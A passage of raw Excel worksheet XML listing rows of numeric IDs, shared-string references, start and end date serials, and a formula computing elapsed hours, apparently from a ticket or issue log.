    <row r="1670" spans="1:8" hidden="1">
      <c r="A1670" t="s">
        <v>4379</v>
      </c>
      <c r="B1670">
        <v>11397</v>
      </c>
      <c r="C1670" t="s">
        <v>4380</v>
      </c>
      <c r="D1670" t="s">
        <v>7</v>
      </c>
      <c r="E1670" s="1">
        <v>43272.137187499997</v>
      </c>
      <c r="F1670" s="1">
        <v>43566.281701388885</v>
      </c>
      <c r="G1670" t="s">
        <v>764</v>
      </c>
      <c r="H1670" t="str">
        <f>TEXT(F1670-E1670,"[h]")</f>
        <v>7059</v>
      </c>
    </row>
    <row r="1671" spans="1:8" hidden="1">
      <c r="A1671" t="s">
        <v>4381</v>
      </c>
      <c r="B1671">
        <v>11396</v>
      </c>
      <c r="C1671" t="s">
        <v>4382</v>
      </c>
      <c r="D1671" t="s">
        <v>7</v>
      </c>
      <c r="E1671" s="1">
        <v>43272.031701388885</v>
      </c>
      <c r="F1671" s="1">
        <v>43281.148020833331</v>
      </c>
      <c r="G1671" t="s">
        <v>2631</v>
      </c>
      <c r="H1671" t="str">
        <f>TEXT(F1671-E1671,"[h]")</f>
        <v>218</v>
      </c>
    </row>
    <row r="1672" spans="1:8">
      <c r="A1672" t="s">
        <v>4383</v>
      </c>
      <c r="B1672">
        <v>11395</v>
      </c>
      <c r="C1672" t="s">
        <v>4384</v>
      </c>
      <c r="D1672" t="s">
        <v>7</v>
      </c>
      <c r="E1672" s="1">
        <v>43272.008067129631</v>
      </c>
      <c r="F1672" s="1">
        <v>43456.005115740743</v>
      </c>
      <c r="G1672" t="s">
        <v>25</v>
      </c>
      <c r="H1672" t="str">
        <f>TEXT(F1672-E1672,"[h]")</f>
        <v>4415</v>
      </c>
    </row>
    <row r="1673" spans="1:8" hidden="1">
      <c r="A1673" t="s">
        <v>446</v>
      </c>
      <c r="B1673">
        <v>11391</v>
      </c>
      <c r="C1673" t="s">
        <v>4385</v>
      </c>
      <c r="D1673" t="s">
        <v>7</v>
      </c>
      <c r="E1673" s="1">
        <v>43271.796932870369</v>
      </c>
      <c r="F1673" s="1">
        <v>43271.843252314815</v>
      </c>
      <c r="G1673" t="s">
        <v>174</v>
      </c>
      <c r="H1673" t="str">
        <f>TEXT(F1673-E1673,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1674" spans="1:8" hidden="1">
      <c r="B1674">
        <v>11390</v>
      </c>
      <c r="C1674" t="s">
        <v>4386</v>
      </c>
      <c r="D1674" t="s">
        <v>7</v>
      </c>
      <c r="E1674" s="1">
        <v>43271.785081018519</v>
      </c>
      <c r="F1674" s="1">
        <v>43271.844918981478</v>
      </c>
      <c r="G1674" t="s">
        <v>4387</v>
      </c>
      <c r="H1674" t="str">
        <f>TEXT(F1674-E1674,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1675" spans="1:8" hidden="1">
      <c r="A1675" t="s">
        <v>4388</v>
      </c>
      <c r="B1675">
        <v>11385</v>
      </c>
      <c r="C1675" t="s">
        <v>4389</v>
      </c>
      <c r="D1675" t="s">
        <v>7</v>
      </c>
      <c r="E1675" s="1">
        <v>43271.21162037037</v>
      </c>
      <c r="F1675" s="1">
        <v>43271.839606481481</v>
      </c>
      <c r="G1675" t="s">
        <v>409</v>
      </c>
      <c r="H1675" t="str">
        <f>TEXT(F1675-E1675,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1676" spans="1:8" hidden="1">
      <c r="A1676" t="s">
        <v>4392</v>
      </c>
      <c r="B1676">
        <v>11383</v>
      </c>
      <c r="C1676" t="s">
        <v>4393</v>
      </c>
      <c r="D1676" t="s">
        <v>7</v>
      </c>
      <c r="E1676" s="1">
        <v>43270.950381944444</v>
      </c>
      <c r="F1676" s="1">
        <v>43275.750289351854</v>
      </c>
      <c r="G1676" t="s">
        <v>222</v>
      </c>
      <c r="H1676" t="str">
        <f>TEXT(F1676-E1676,"[h]")</f>
        <v>115</v>
      </c>
    </row>
    <row r="1677" spans="1:8" hidden="1">
      <c r="A1677" t="s">
        <v>4394</v>
      </c>
      <c r="B1677">
        <v>11382</v>
      </c>
      <c r="C1677" t="s">
        <v>4395</v>
      </c>
      <c r="D1677" t="s">
        <v>7</v>
      </c>
      <c r="E1677" s="1">
        <v>43270.918981481482</v>
      </c>
      <c r="F1677" s="1">
        <v>43295.202256944445</v>
      </c>
      <c r="G1677" t="s">
        <v>764</v>
      </c>
      <c r="H1677" t="str">
        <f>TEXT(F1677-E1677,"[h]")</f>
        <v>582</v>
      </c>
    </row>
    <row r="1678" spans="1:8">
      <c r="A1678" t="s">
        <v>4396</v>
      </c>
      <c r="B1678">
        <v>11381</v>
      </c>
      <c r="C1678" t="s">
        <v>4397</v>
      </c>
      <c r="D1678" t="s">
        <v>7</v>
      </c>
      <c r="E1678" s="1">
        <v>43270.89603009259</v>
      </c>
      <c r="F1678" s="1">
        <v>43275.989062499997</v>
      </c>
      <c r="G1678" t="s">
        <v>1669</v>
      </c>
      <c r="H1678" t="str">
        <f>TEXT(F1678-E1678,"[h]")</f>
        <v>122</v>
      </c>
    </row>
    <row r="1679" spans="1:8">
      <c r="A1679" t="s">
        <v>4398</v>
      </c>
      <c r="B1679">
        <v>11379</v>
      </c>
      <c r="C1679" t="s">
        <v>4399</v>
      </c>
      <c r="D1679" t="s">
        <v>7</v>
      </c>
      <c r="E1679" s="1">
        <v>43270.529027777775</v>
      </c>
      <c r="F1679" s="1">
        <v>43270.668391203704</v>
      </c>
      <c r="G1679" t="s">
        <v>16</v>
      </c>
      <c r="H1679" t="str">
        <f>TEXT(F1679-E1679,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1680" spans="1:8">
      <c r="A1680" t="s">
        <v>4400</v>
      </c>
      <c r="B1680">
        <v>11378</v>
      </c>
      <c r="C1680" t="s">
        <v>4401</v>
      </c>
      <c r="D1680" t="s">
        <v>7</v>
      </c>
      <c r="E1680" s="1">
        <v>43270.351597222223</v>
      </c>
      <c r="F1680" s="1">
        <v>43270.668391203704</v>
      </c>
      <c r="G1680" t="s">
        <v>376</v>
      </c>
      <c r="H1680" t="str">
        <f>TEXT(F1680-E1680,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1681" spans="1:8">
      <c r="A1681" t="s">
        <v>4402</v>
      </c>
      <c r="B1681">
        <v>11377</v>
      </c>
      <c r="C1681" t="s">
        <v>4403</v>
      </c>
      <c r="D1681" t="s">
        <v>7</v>
      </c>
      <c r="E1681" s="1">
        <v>43270.057071759256</v>
      </c>
      <c r="F1681" s="1">
        <v>43479.425810185188</v>
      </c>
      <c r="G1681" t="s">
        <v>25</v>
      </c>
      <c r="H1681" t="str">
        <f>TEXT(F1681-E1681,"[h]")</f>
        <v>5024</v>
      </c>
    </row>
    <row r="1682" spans="1:8" hidden="1">
      <c r="A1682" t="s">
        <v>4390</v>
      </c>
      <c r="B1682">
        <v>11376</v>
      </c>
      <c r="C1682" t="s">
        <v>4391</v>
      </c>
      <c r="D1682" t="s">
        <v>7</v>
      </c>
      <c r="E1682" s="1">
        <v>43269.879374999997</v>
      </c>
      <c r="F1682" s="1">
        <v>43271.699004629627</v>
      </c>
      <c r="G1682" t="s">
        <v>37</v>
      </c>
      <c r="H1682" t="str">
        <f>TEXT(F1682-E1682,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="1683" spans="1:8" hidden="1">
      <c r="A1683" t="s">
        <v>4404</v>
      </c>
      <c r="B1683">
        <v>11373</v>
      </c>
      <c r="C1683" t="s">
        <v>4405</v>
      </c>
      <c r="D1683" t="s">
        <v>7</v>
      </c>
      <c r="E1683" s="1">
        <v>43269.193124999998</v>
      </c>
      <c r="F1683" s="1">
        <v>43269.964513888888</v>
      </c>
      <c r="G1683" t="s">
        <v>2631</v>
      </c>
      <c r="H1683" t="str">
        <f>TEXT(F1683-E1683,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1684" spans="1:8" hidden="1">
      <c r="A1684" t="s">
        <v>4406</v>
      </c>
      <c r="B1684">
        <v>11372</v>
      </c>
      <c r="C1684" t="s">
        <v>4407</v>
      </c>
      <c r="D1684" t="s">
        <v>7</v>
      </c>
      <c r="E1684" s="1">
        <v>43269.112187500003</v>
      </c>
      <c r="F1684" s="1">
        <v>43439.756574074076</v>
      </c>
      <c r="G1684" t="s">
        <v>4408</v>
      </c>
      <c r="H1684" t="str">
        <f>TEXT(F1684-E1684,"[h]")</f>
        <v>4095</v>
      </c>
    </row>
    <row r="1685" spans="1:8" hidden="1">
      <c r="A1685" t="s">
        <v>4409</v>
      </c>
      <c r="B1685">
        <v>11371</v>
      </c>
      <c r="C1685" t="s">
        <v>4410</v>
      </c>
      <c r="D1685" t="s">
        <v>7</v>
      </c>
      <c r="E1685" s="1">
        <v>43269.110358796293</v>
      </c>
      <c r="F1685" s="1">
        <v>43269.868263888886</v>
      </c>
      <c r="G1685" t="s">
        <v>75</v>
      </c>
      <c r="H1685" t="str">
        <f>TEXT(F1685-E1685,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1686" spans="1:8" hidden="1">
      <c r="A1686" t="s">
        <v>4411</v>
      </c>
      <c r="B1686">
        <v>11369</v>
      </c>
      <c r="C1686" t="s">
        <v>4412</v>
      </c>
      <c r="D1686" t="s">
        <v>7</v>
      </c>
      <c r="E1686" s="1">
        <v>43269.090810185182</v>
      </c>
      <c r="F1686" s="1">
        <v>43456.51116898148</v>
      </c>
      <c r="G1686" t="s">
        <v>4413</v>
      </c>
      <c r="H1686" t="str">
        <f>TEXT(F1686-E1686,"[h]")</f>
        <v>4498</v>
      </c>
    </row>
    <row r="1687" spans="1:8">
      <c r="A1687" t="s">
        <v>4414</v>
      </c>
      <c r="B1687">
        <v>11366</v>
      </c>
      <c r="C1687" t="s">
        <v>4415</v>
      </c>
      <c r="D1687" t="s">
        <v>7</v>
      </c>
      <c r="E1687" s="1">
        <v>43268.805277777778</v>
      </c>
      <c r="F1687" s="1">
        <v>43268.964675925927</v>
      </c>
      <c r="G1687" t="s">
        <v>1456</v>
      </c>
      <c r="H1687" t="str">
        <f>TEXT(F1687-E1687,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1688" spans="1:8">
      <c r="A1688" t="s">
        <v>4416</v>
      </c>
      <c r="B1688">
        <v>11365</v>
      </c>
      <c r="C1688" t="s">
        <v>4417</v>
      </c>
      <c r="D1688" t="s">
        <v>7</v>
      </c>
      <c r="E1688" s="1">
        <v>43268.729826388888</v>
      </c>
      <c r="F1688" s="1">
        <v>43268.818564814814</v>
      </c>
      <c r="G1688" t="s">
        <v>16</v>
      </c>
      <c r="H1688" t="str">
        <f>TEXT(F1688-E1688,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1689" spans="1:8">
      <c r="A1689" t="s">
        <v>4418</v>
      </c>
      <c r="B1689">
        <v>11364</v>
      </c>
      <c r="C1689" t="s">
        <v>4419</v>
      </c>
      <c r="D1689" t="s">
        <v>7</v>
      </c>
      <c r="E1689" s="1">
        <v>43268.703888888886</v>
      </c>
      <c r="F1689" s="1">
        <v>43268.964675925927</v>
      </c>
      <c r="G1689" t="s">
        <v>25</v>
      </c>
      <c r="H1689" t="str">
        <f>TEXT(F1689-E1689,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1690" spans="1:8">
      <c r="A1690" t="s">
        <v>4420</v>
      </c>
      <c r="B1690">
        <v>11363</v>
      </c>
      <c r="C1690" t="s">
        <v>4421</v>
      </c>
      <c r="D1690" t="s">
        <v>7</v>
      </c>
      <c r="E1690" s="1">
        <v>43268.660810185182</v>
      </c>
      <c r="F1690" s="1">
        <v>43268.818564814814</v>
      </c>
      <c r="G1690" t="s">
        <v>25</v>
      </c>
      <c r="H1690" t="str">
        <f>TEXT(F1690-E1690,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1691" spans="1:8" hidden="1">
      <c r="B1691">
        <v>11362</v>
      </c>
      <c r="C1691" t="s">
        <v>4422</v>
      </c>
      <c r="D1691" t="s">
        <v>7</v>
      </c>
      <c r="E1691" s="1">
        <v>43267.892314814817</v>
      </c>
      <c r="F1691" s="1">
        <v>43272.693819444445</v>
      </c>
      <c r="G1691" t="s">
        <v>51</v>
      </c>
      <c r="H1691" t="str">
        <f>TEXT(F1691-E1691,"[h]")</f>
        <v>115</v>
      </c>
    </row>
    <row r="1692" spans="1:8" hidden="1">
      <c r="A1692" t="s">
        <v>4423</v>
      </c>
      <c r="B1692">
        <v>11361</v>
      </c>
      <c r="C1692" t="s">
        <v>4424</v>
      </c>
      <c r="D1692" t="s">
        <v>7</v>
      </c>
      <c r="E1692" s="1">
        <v>43267.863402777781</v>
      </c>
      <c r="F1692" s="1">
        <v>43672.619050925925</v>
      </c>
      <c r="G1692" t="s">
        <v>174</v>
      </c>
      <c r="H1692" t="str">
        <f>TEXT(F1692-E1692,"[h]")</f>
        <v>9714</v>
      </c>
    </row>
    <row r="1693" spans="1:8" hidden="1">
      <c r="A1693" t="s">
        <v>4427</v>
      </c>
      <c r="B1693">
        <v>11358</v>
      </c>
      <c r="C1693" t="s">
        <v>4428</v>
      </c>
      <c r="D1693" t="s">
        <v>7</v>
      </c>
      <c r="E1693" s="1">
        <v>43267.371400462966</v>
      </c>
      <c r="F1693" s="1">
        <v>43549.391516203701</v>
      </c>
      <c r="G1693" t="s">
        <v>4429</v>
      </c>
      <c r="H1693" t="str">
        <f>TEXT(F1693-E1693,"[h]")</f>
        <v>6768</v>
      </c>
    </row>
    <row r="1694" spans="1:8" hidden="1">
      <c r="A1694" t="s">
        <v>4430</v>
      </c>
      <c r="B1694">
        <v>11357</v>
      </c>
      <c r="C1694" t="s">
        <v>4431</v>
      </c>
      <c r="D1694" t="s">
        <v>7</v>
      </c>
      <c r="E1694" s="1">
        <v>43267.355312500003</v>
      </c>
      <c r="F1694" s="1">
        <v>43267.725821759261</v>
      </c>
      <c r="G1694" t="s">
        <v>174</v>
      </c>
      <c r="H1694" t="str">
        <f>TEXT(F1694-E1694,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1695" spans="1:8" hidden="1">
      <c r="A1695" t="s">
        <v>4432</v>
      </c>
      <c r="B1695">
        <v>11356</v>
      </c>
      <c r="C1695" t="s">
        <v>4433</v>
      </c>
      <c r="D1695" t="s">
        <v>7</v>
      </c>
      <c r="E1695" s="1">
        <v>43267.309629629628</v>
      </c>
      <c r="F1695" s="1">
        <v>43269.950520833336</v>
      </c>
      <c r="G1695" t="s">
        <v>998</v>
      </c>
      <c r="H1695" t="str">
        <f>TEXT(F1695-E1695,"[h]")</f>
        <v>63</v>
      </c>
    </row>
    <row r="1696" spans="1:8" hidden="1">
      <c r="A1696" t="s">
        <v>4434</v>
      </c>
      <c r="B1696">
        <v>11355</v>
      </c>
      <c r="C1696" t="s">
        <v>4435</v>
      </c>
      <c r="D1696" t="s">
        <v>7</v>
      </c>
      <c r="E1696" s="1">
        <v>43267.297407407408</v>
      </c>
      <c r="F1696" s="1">
        <v>43279.727453703701</v>
      </c>
      <c r="G1696" t="s">
        <v>75</v>
      </c>
      <c r="H1696" t="str">
        <f>TEXT(F1696-E1696,"[h]")</f>
        <v>298</v>
      </c>
    </row>
    <row r="1697" spans="1:8" hidden="1">
      <c r="A1697" t="s">
        <v>4436</v>
      </c>
      <c r="B1697">
        <v>11353</v>
      </c>
      <c r="C1697" t="s">
        <v>4437</v>
      </c>
      <c r="D1697" t="s">
        <v>7</v>
      </c>
      <c r="E1697" s="1">
        <v>43267.210138888891</v>
      </c>
      <c r="F1697" s="1">
        <v>43267.656597222223</v>
      </c>
      <c r="G1697" t="s">
        <v>90</v>
      </c>
      <c r="H1697" t="str">
        <f>TEXT(F1697-E1697,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1698" spans="1:8" hidden="1">
      <c r="A1698" t="s">
        <v>4440</v>
      </c>
      <c r="B1698">
        <v>11351</v>
      </c>
      <c r="C1698" t="s">
        <v>4441</v>
      </c>
      <c r="D1698" t="s">
        <v>7</v>
      </c>
      <c r="E1698" s="1">
        <v>43267.020729166667</v>
      </c>
      <c r="F1698" s="1">
        <v>43283.667233796295</v>
      </c>
      <c r="G1698" t="s">
        <v>883</v>
      </c>
      <c r="H1698" t="str">
        <f>TEXT(F1698-E1698,"[h]")</f>
        <v>399</v>
      </c>
    </row>
    <row r="1699" spans="1:8" hidden="1">
      <c r="A1699" t="s">
        <v>4442</v>
      </c>
      <c r="B1699">
        <v>11350</v>
      </c>
      <c r="C1699" t="s">
        <v>4443</v>
      </c>
      <c r="D1699" t="s">
        <v>7</v>
      </c>
      <c r="E1699" s="1">
        <v>43266.958101851851</v>
      </c>
      <c r="F1699" s="1">
        <v>43272.950127314813</v>
      </c>
      <c r="G1699" t="s">
        <v>51</v>
      </c>
      <c r="H1699" t="str">
        <f>TEXT(F1699-E1699,"[h]")</f>
        <v>143</v>
      </c>
    </row>
    <row r="1700" spans="1:8" hidden="1">
      <c r="A1700" t="s">
        <v>4425</v>
      </c>
      <c r="B1700">
        <v>11349</v>
      </c>
      <c r="C1700" t="s">
        <v>4426</v>
      </c>
      <c r="D1700" t="s">
        <v>7</v>
      </c>
      <c r="E1700" s="1">
        <v>43266.94804398148</v>
      </c>
      <c r="F1700" s="1">
        <v>43267.170347222222</v>
      </c>
      <c r="G1700" t="s">
        <v>51</v>
      </c>
      <c r="H1700" t="str">
        <f>TEXT(F1700-E1700,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1701" spans="1:8" hidden="1">
      <c r="A1701" t="s">
        <v>4444</v>
      </c>
      <c r="B1701">
        <v>11348</v>
      </c>
      <c r="C1701" t="s">
        <v>4445</v>
      </c>
      <c r="D1701" t="s">
        <v>7</v>
      </c>
      <c r="E1701" s="1">
        <v>43266.919108796297</v>
      </c>
      <c r="F1701" s="1">
        <v>43405.728113425925</v>
      </c>
      <c r="G1701" t="s">
        <v>4446</v>
      </c>
      <c r="H1701" t="str">
        <f>TEXT(F1701-E1701,"[h]")</f>
        <v>3331</v>
      </c>
    </row>
    <row r="1702" spans="1:8" hidden="1">
      <c r="A1702" t="s">
        <v>4447</v>
      </c>
      <c r="B1702">
        <v>11347</v>
      </c>
      <c r="C1702" t="s">
        <v>4448</v>
      </c>
      <c r="D1702" t="s">
        <v>7</v>
      </c>
      <c r="E1702" s="1">
        <v>43266.83902777778</v>
      </c>
      <c r="F1702" s="1">
        <v>43279.090636574074</v>
      </c>
      <c r="G1702" t="s">
        <v>90</v>
      </c>
      <c r="H1702" t="str">
        <f>TEXT(F1702-E1702,"[h]")</f>
        <v>294</v>
      </c>
    </row>
    <row r="1703" spans="1:8">
      <c r="A1703" t="s">
        <v>4274</v>
      </c>
      <c r="B1703">
        <v>11345</v>
      </c>
      <c r="C1703" t="s">
        <v>4275</v>
      </c>
      <c r="D1703" t="s">
        <v>7</v>
      </c>
      <c r="E1703" s="1">
        <v>43266.777372685188</v>
      </c>
      <c r="F1703" s="1">
        <v>43284.766111111108</v>
      </c>
      <c r="G1703" t="s">
        <v>3487</v>
      </c>
      <c r="H1703" t="str">
        <f>TEXT(F1703-E1703,"[h]")</f>
        <v>431</v>
      </c>
    </row>
    <row r="1704" spans="1:8" hidden="1">
      <c r="A1704" t="s">
        <v>4449</v>
      </c>
      <c r="B1704">
        <v>11344</v>
      </c>
      <c r="C1704" t="s">
        <v>4450</v>
      </c>
      <c r="D1704" t="s">
        <v>7</v>
      </c>
      <c r="E1704" s="1">
        <v>43266.742650462962</v>
      </c>
      <c r="F1704" s="1">
        <v>43271.252256944441</v>
      </c>
      <c r="G1704" t="s">
        <v>157</v>
      </c>
      <c r="H1704" t="str">
        <f>TEXT(F1704-E1704,"[h]")</f>
        <v>108</v>
      </c>
    </row>
    <row r="1705" spans="1:8">
      <c r="A1705" t="s">
        <v>4451</v>
      </c>
      <c r="B1705">
        <v>11341</v>
      </c>
      <c r="C1705" t="s">
        <v>4452</v>
      </c>
      <c r="D1705" t="s">
        <v>7</v>
      </c>
      <c r="E1705" s="1">
        <v>43266.31858796296</v>
      </c>
      <c r="F1705" s="1">
        <v>43295.202256944445</v>
      </c>
      <c r="G1705" t="s">
        <v>25</v>
      </c>
      <c r="H1705" t="str">
        <f>TEXT(F1705-E1705,"[h]")</f>
        <v>693</v>
      </c>
    </row>
    <row r="1706" spans="1:8">
      <c r="B1706">
        <v>11340</v>
      </c>
      <c r="C1706" t="s">
        <v>4453</v>
      </c>
      <c r="D1706" t="s">
        <v>7</v>
      </c>
      <c r="E1706" s="1">
        <v>43266.287488425929</v>
      </c>
      <c r="F1706" s="1">
        <v>43272.516041666669</v>
      </c>
      <c r="G1706" t="s">
        <v>16</v>
      </c>
      <c r="H1706" t="str">
        <f>TEXT(F1706-E1706,"[h]")</f>
        <v>149</v>
      </c>
    </row>
    <row r="1707" spans="1:8">
      <c r="A1707" t="s">
        <v>4454</v>
      </c>
      <c r="B1707">
        <v>11339</v>
      </c>
      <c r="C1707" t="s">
        <v>4455</v>
      </c>
      <c r="D1707" t="s">
        <v>7</v>
      </c>
      <c r="E1707" s="1">
        <v>43266.054027777776</v>
      </c>
      <c r="F1707" s="1">
        <v>43266.592164351852</v>
      </c>
      <c r="G1707" t="s">
        <v>4059</v>
      </c>
      <c r="H1707" t="str">
        <f>TEXT(F1707-E1707,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="1708" spans="1:8" hidden="1">
      <c r="A1708" t="s">
        <v>4456</v>
      </c>
      <c r="B1708">
        <v>11338</v>
      </c>
      <c r="C1708" t="s">
        <v>4457</v>
      </c>
      <c r="D1708" t="s">
        <v>7</v>
      </c>
      <c r="E1708" s="1">
        <v>43265.886944444443</v>
      </c>
      <c r="F1708" s="1">
        <v>43279.83353009259</v>
      </c>
      <c r="G1708" t="s">
        <v>883</v>
      </c>
      <c r="H1708" t="str">
        <f>TEXT(F1708-E1708,"[h]")</f>
        <v>334</v>
      </c>
    </row>
    <row r="1709" spans="1:8" hidden="1">
      <c r="B1709">
        <v>11337</v>
      </c>
      <c r="C1709" t="s">
        <v>4458</v>
      </c>
      <c r="D1709" t="s">
        <v>7</v>
      </c>
      <c r="E1709" s="1">
        <v>43265.794259259259</v>
      </c>
      <c r="F1709" s="1">
        <v>43284.585648148146</v>
      </c>
      <c r="G1709" t="s">
        <v>4459</v>
      </c>
      <c r="H1709" t="str">
        <f>TEXT(F1709-E1709,"[h]")</f>
        <v>450</v>
      </c>
    </row>
    <row r="1710" spans="1:8">
      <c r="A1710" t="s">
        <v>4460</v>
      </c>
      <c r="B1710">
        <v>11336</v>
      </c>
      <c r="C1710" t="s">
        <v>4461</v>
      </c>
      <c r="D1710" t="s">
        <v>7</v>
      </c>
      <c r="E1710" s="1">
        <v>43265.732048611113</v>
      </c>
      <c r="F1710" s="1">
        <v>43265.94327546296</v>
      </c>
      <c r="G1710" t="s">
        <v>1669</v>
      </c>
      <c r="H1710" t="str">
        <f>TEXT(F1710-E1710,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1711" spans="1:8" hidden="1">
      <c r="A1711" t="s">
        <v>4462</v>
      </c>
      <c r="B1711">
        <v>11335</v>
      </c>
      <c r="C1711" t="s">
        <v>4463</v>
      </c>
      <c r="D1711" t="s">
        <v>7</v>
      </c>
      <c r="E1711" s="1">
        <v>43265.708506944444</v>
      </c>
      <c r="F1711" s="1">
        <v>43277.015451388892</v>
      </c>
      <c r="G1711" t="s">
        <v>66</v>
      </c>
      <c r="H1711" t="str">
        <f>TEXT(F1711-E1711,"[h]")</f>
        <v>271</v>
      </c>
    </row>
    <row r="1712" spans="1:8" hidden="1">
      <c r="A1712" t="s">
        <v>4464</v>
      </c>
      <c r="B1712">
        <v>11333</v>
      </c>
      <c r="C1712" t="s">
        <v>4465</v>
      </c>
      <c r="D1712" t="s">
        <v>7</v>
      </c>
      <c r="E1712" s="1">
        <v>43265.601585648146</v>
      </c>
      <c r="F1712" s="1">
        <v>43272.612141203703</v>
      </c>
      <c r="G1712" t="s">
        <v>883</v>
      </c>
      <c r="H1712" t="str">
        <f>TEXT(F1712-E1712,"[h]")</f>
        <v>168</v>
      </c>
    </row>
    <row r="1713" spans="1:8" hidden="1">
      <c r="A1713" t="s">
        <v>4466</v>
      </c>
      <c r="B1713">
        <v>11332</v>
      </c>
      <c r="C1713" t="s">
        <v>1753</v>
      </c>
      <c r="D1713" t="s">
        <v>7</v>
      </c>
      <c r="E1713" s="1">
        <v>43265.490925925929</v>
      </c>
      <c r="F1713" s="1">
        <v>43601.738391203704</v>
      </c>
      <c r="G1713" t="s">
        <v>2919</v>
      </c>
      <c r="H1713" t="str">
        <f>TEXT(F1713-E1713,"[h]")</f>
        <v>8069</v>
      </c>
    </row>
    <row r="1714" spans="1:8" hidden="1">
      <c r="A1714" t="s">
        <v>4467</v>
      </c>
      <c r="B1714">
        <v>11328</v>
      </c>
      <c r="C1714" t="s">
        <v>4468</v>
      </c>
      <c r="D1714" t="s">
        <v>7</v>
      </c>
      <c r="E1714" s="1">
        <v>43265.223622685182</v>
      </c>
      <c r="F1714" s="1">
        <v>43265.687002314815</v>
      </c>
      <c r="G1714" t="s">
        <v>174</v>
      </c>
      <c r="H1714" t="str">
        <f>TEXT(F1714-E1714,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1715" spans="1:8" hidden="1">
      <c r="A1715" t="s">
        <v>446</v>
      </c>
      <c r="B1715">
        <v>11327</v>
      </c>
      <c r="C1715" t="s">
        <v>4469</v>
      </c>
      <c r="D1715" t="s">
        <v>7</v>
      </c>
      <c r="E1715" s="1">
        <v>43265.004699074074</v>
      </c>
      <c r="F1715" s="1">
        <v>43266.896157407406</v>
      </c>
      <c r="G1715" t="s">
        <v>51</v>
      </c>
      <c r="H1715" t="str">
        <f>TEXT(F1715-E1715,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="1716" spans="1:8" hidden="1">
      <c r="A1716" t="s">
        <v>4470</v>
      </c>
      <c r="B1716">
        <v>11326</v>
      </c>
      <c r="C1716" t="s">
        <v>4471</v>
      </c>
      <c r="D1716" t="s">
        <v>7</v>
      </c>
      <c r="E1716" s="1">
        <v>43264.715636574074</v>
      </c>
      <c r="F1716" s="1">
        <v>43264.835300925923</v>
      </c>
      <c r="G1716" t="s">
        <v>66</v>
      </c>
      <c r="H1716" t="str">
        <f>TEXT(F1716-E1716,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1717" spans="1:8" hidden="1">
      <c r="A1717" t="s">
        <v>4472</v>
      </c>
      <c r="B1717">
        <v>11324</v>
      </c>
      <c r="C1717" t="s">
        <v>4473</v>
      </c>
      <c r="D1717" t="s">
        <v>7</v>
      </c>
      <c r="E1717" s="1">
        <v>43264.365405092591</v>
      </c>
      <c r="F1717" s="1">
        <v>43264.689837962964</v>
      </c>
      <c r="G1717" t="s">
        <v>769</v>
      </c>
      <c r="H1717" t="str">
        <f>TEXT(F1717-E1717,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1718" spans="1:8" hidden="1">
      <c r="A1718" t="s">
        <v>4438</v>
      </c>
      <c r="B1718">
        <v>11323</v>
      </c>
      <c r="C1718" t="s">
        <v>4439</v>
      </c>
      <c r="D1718" t="s">
        <v>7</v>
      </c>
      <c r="E1718" s="1">
        <v>43264.343553240738</v>
      </c>
      <c r="F1718" s="1">
        <v>43267.867060185185</v>
      </c>
      <c r="G1718" t="s">
        <v>1230</v>
      </c>
      <c r="H1718" t="str">
        <f>TEXT(F1718-E1718,"[h]")</f>
        <v>84</v>
      </c>
    </row>
    <row r="1719" spans="1:8">
      <c r="A1719" t="s">
        <v>4474</v>
      </c>
      <c r="B1719">
        <v>11321</v>
      </c>
      <c r="C1719" t="s">
        <v>4475</v>
      </c>
      <c r="D1719" t="s">
        <v>7</v>
      </c>
      <c r="E1719" s="1">
        <v>43264.206631944442</v>
      </c>
      <c r="F1719" s="1">
        <v>43264.217430555553</v>
      </c>
      <c r="G1719" t="s">
        <v>25</v>
      </c>
      <c r="H1719" t="str">
        <f>TEXT(F1719-E1719,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1720" spans="1:8">
      <c r="A1720" t="s">
        <v>4476</v>
      </c>
      <c r="B1720">
        <v>11320</v>
      </c>
      <c r="C1720" t="s">
        <v>4477</v>
      </c>
      <c r="D1720" t="s">
        <v>7</v>
      </c>
      <c r="E1720" s="1">
        <v>43264.03230324074</v>
      </c>
      <c r="F1720" s="1">
        <v>43265.887523148151</v>
      </c>
      <c r="G1720" t="s">
        <v>4478</v>
      </c>
      <c r="H1720" t="str">
        <f>TEXT(F1720-E1720,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="1721" spans="1:8" hidden="1">
      <c r="A1721" t="s">
        <v>4479</v>
      </c>
      <c r="B1721">
        <v>11319</v>
      </c>
      <c r="C1721" t="s">
        <v>4480</v>
      </c>
      <c r="D1721" t="s">
        <v>7</v>
      </c>
      <c r="E1721" s="1">
        <v>43263.926018518519</v>
      </c>
      <c r="F1721" s="1">
        <v>43264.095543981479</v>
      </c>
      <c r="G1721" t="s">
        <v>474</v>
      </c>
      <c r="H1721" t="str">
        <f>TEXT(F1721-E1721,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1722" spans="1:8" hidden="1">
      <c r="B1722">
        <v>11318</v>
      </c>
      <c r="C1722" t="s">
        <v>4481</v>
      </c>
      <c r="D1722" t="s">
        <v>7</v>
      </c>
      <c r="E1722" s="1">
        <v>43263.919895833336</v>
      </c>
      <c r="F1722" s="1">
        <v>43264.050115740742</v>
      </c>
      <c r="G1722" t="s">
        <v>592</v>
      </c>
